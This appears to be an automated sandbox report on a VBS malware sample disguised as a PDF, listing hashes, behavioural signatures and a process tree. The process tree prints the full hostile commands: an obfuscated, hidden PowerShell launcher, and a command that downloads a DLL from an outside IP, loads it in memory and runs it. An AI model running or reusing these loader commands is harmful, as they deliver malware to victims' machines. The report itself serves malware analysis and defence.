Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-12-2024 03:13
Static task
static1
Behavioral task
behavioral1
Sample
RFAU02GSHKOPSFDQW_002_PDF.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
RFAU02GSHKOPSFDQW_002_PDF.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
RV07QAROPHDFSRE_001_PDF_clean.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
RV07QAROPHDFSRE_001_PDF_clean.exe
Resource
win10v2004-20241007-en
General
-
Target
RFAU02GSHKOPSFDQW_002_PDF.vbs
-
Size
222KB
-
MD5
f212536d8cdf98f7284837ee48886346
-
SHA1
7fe473d02fe0dc783b6021c792abca338dc4e11f
-
SHA256
91f8e59475196b2ab33f9e5e22beb04d3ee039985abe1572a4a6e7b3f6f8b74d
-
SHA512
08524a86d5b9f53953e9587286e7210c48ee403e99c67f13dbdd5081a7d558c58541c4e95b6ca640a98a5e5d8a634127801767655b168fa8889357d3319880c6
-
SSDEEP
192:Oply3gSajcsbpS1zQ1QXDebjDqNBft1hx8+W6h8VDvwAv1CjIc:ODokghw1HqR98dfH1Cjj
Malware Config
Extracted
http://20.106.255.48/dll/TESTING.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2688 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2696 powershell.exe 2688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2696 powershell.exe 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2848 wrote to memory of 2696 2848 WScript.exe 31 PID 2848 wrote to memory of 2696 2848 WScript.exe 31 PID 2848 wrote to memory of 2696 2848 WScript.exe 31 PID 2696 wrote to memory of 2688 2696 powershell.exe 33 PID 2696 wrote to memory of 2688 2696 powershell.exe 33 PID 2696 wrote to memory of 2688 2696 powershell.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFAU02GSHKOPSFDQW_002_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC❤Hk❤d❤Bl❤Fs❤XQBd❤C❤❤J❤BE❤Ew❤T❤❤g❤D0❤I❤Bb❤FM❤eQBz❤HQ❤ZQBt❤C4❤QwBv❤G4❤dgBl❤HI❤d❤Bd❤Do❤OgBG❤HI❤bwBt❤EI❤YQBz❤GU❤Ng❤0❤FM❤d❤By❤Gk❤bgBn❤Cg❤K❤BO❤GU❤dw❤t❤E8❤YgBq❤GU❤YwB0❤C❤❤TgBl❤HQ❤LgBX❤GU❤YgBD❤Gw❤aQBl❤G4❤d❤❤p❤C4❤R❤Bv❤Hc❤bgBs❤G8❤YQBk❤FM❤d❤By❤Gk❤bgBn❤Cg❤JwBo❤HQ❤d❤Bw❤Do❤Lw❤v❤DI❤M❤❤u❤DE❤M❤❤2❤C4❤Mg❤1❤DU❤Lg❤0❤Dg❤LwBk❤Gw❤b❤❤v❤FQ❤RQBT❤FQ❤SQBO❤Ec❤LgB0❤Hg❤d❤❤n❤Ck❤KQ❤7❤Fs❤UwB5❤HM❤d❤Bl❤G0❤LgBB❤H❤❤c❤BE❤G8❤bQBh❤Gk❤bgBd❤Do❤OgBD❤HU❤cgBy❤GU❤bgB0❤EQ❤bwBt❤GE❤aQBu❤C4❤T❤Bv❤GE❤Z❤❤o❤CQ❤R❤BM❤Ew❤KQ❤u❤Ec❤ZQB0❤FQ❤eQBw❤GU❤K❤❤n❤EY❤aQBi❤GU❤cg❤u❤Eg❤bwBt❤GU❤Jw❤p❤C4❤RwBl❤HQ❤TQBl❤HQ❤a❤Bv❤GQ❤K❤❤n❤FY❤QQBJ❤Cc❤KQ❤u❤Ek❤bgB2❤G8❤awBl❤Cg❤J❤Bu❤HU❤b❤Bs❤Cw❤I❤Bb❤G8❤YgBq❤GU❤YwB0❤Fs❤XQBd❤C❤❤K❤❤n❤DU❤Mg❤1❤Dk❤M❤Bl❤GI❤Yg❤w❤DI❤NQ❤0❤C0❤O❤❤z❤Dc❤OQ❤t❤DQ❤Yg❤1❤DQ❤LQBi❤Dc❤ZgBl❤C0❤Mw❤x❤GI❤YwBh❤GY❤N❤❤2❤D0❤bgBl❤Gs❤bwB0❤CY❤YQBp❤GQ❤ZQBt❤D0❤d❤Bs❤GE❤PwB0❤Hg❤d❤❤u❤D❤❤MgBB❤FI❤RQ❤v❤G8❤LwBt❤G8❤Yw❤u❤HQ❤bwBw❤HM❤c❤Bw❤GE❤Lg❤w❤Dc❤N❤Bm❤GY❤LQBz❤HI❤LwBi❤C8❤M❤B2❤C8❤bQBv❤GM❤LgBz❤Gk❤c❤Bh❤GU❤b❤Bn❤G8❤bwBn❤C4❤ZQBn❤GE❤cgBv❤HQ❤cwBl❤HM❤YQBi❤GU❤cgBp❤GY❤Lw❤v❤Do❤cwBw❤HQ❤d❤Bo❤Cc❤KQ❤p❤❤==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('❤','A') ) ).replace('%testinmg%','');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.255.48/dll/TESTING.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('52590ebb0254-8379-4b54-b7fe-31bcaf46=nekot&aidem=tla?txt.02ARE/o/moc.topsppa.074ff-sr/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5da8d6c12fda9263b710142c3543e0bc4
SHA17ea98f73b3c61168f468aabf6ab6f07701d99a16
SHA256b2ffc0d596d560c3b5f0ec599992f7b7f31d98ce54240f0948088b2b2688b76f
SHA51285d221597c18c7198a0a37fa1d9efa3f3b20ee3f19c82e52c341132d1beff1198f0a89080e054790f733a5a77c4e5e9afcadbf984f032e2f5e19700f45e37956